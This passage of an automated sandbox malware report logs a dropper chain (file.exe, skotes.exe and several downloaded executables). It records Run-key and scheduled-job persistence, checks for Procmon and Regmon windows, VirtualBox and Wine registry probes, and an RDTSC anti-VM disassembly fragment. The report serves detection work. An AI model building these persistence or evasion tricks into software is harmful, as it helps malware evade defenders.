Source: 86526d7b20.exe.6.dr Static PE information: section name: ldvhpekm entropy: 7.955852515970652
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2235d4f703.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 86526d7b20.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9afe8d29fa.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d0d78d3fdb.exe Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2235d4f703.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2235d4f703.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 86526d7b20.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 86526d7b20.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9afe8d29fa.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9afe8d29fa.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d0d78d3fdb.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d0d78d3fdb.exe Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe System information queried: FirmwareTableInformation
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BF2AB second address: 6BEBBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jg 00007FA67D080296h 0x0000000e popad 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 stc 0x00000014 push dword ptr [ebp+122D01FDh] 0x0000001a or dword ptr [ebp+122D222Ch], eax 0x00000020 call dword ptr [ebp+122D36FCh] 0x00000026 pushad 0x00000027 add dword ptr [ebp+122D2181h], esi 0x0000002d xor eax, eax 0x0000002f jmp 00007FA67D08029Fh 0x00000034 mov edx, dword ptr [esp+28h] 0x00000038 mov dword ptr [ebp+122D2181h], eax 0x0000003e mov dword ptr [ebp+122D3AC0h], eax 0x00000044 jno 00007FA67D0802A3h 0x0000004a sub dword ptr [ebp+122D255Fh], ecx 0x00000050 mov esi, 0000003Ch 0x00000055 stc 0x00000056 mov dword ptr [ebp+122D255Fh], edi 0x0000005c add esi, dword ptr [esp+24h] 0x00000060 mov dword ptr [ebp+122D2181h], ecx 0x00000066 lodsw 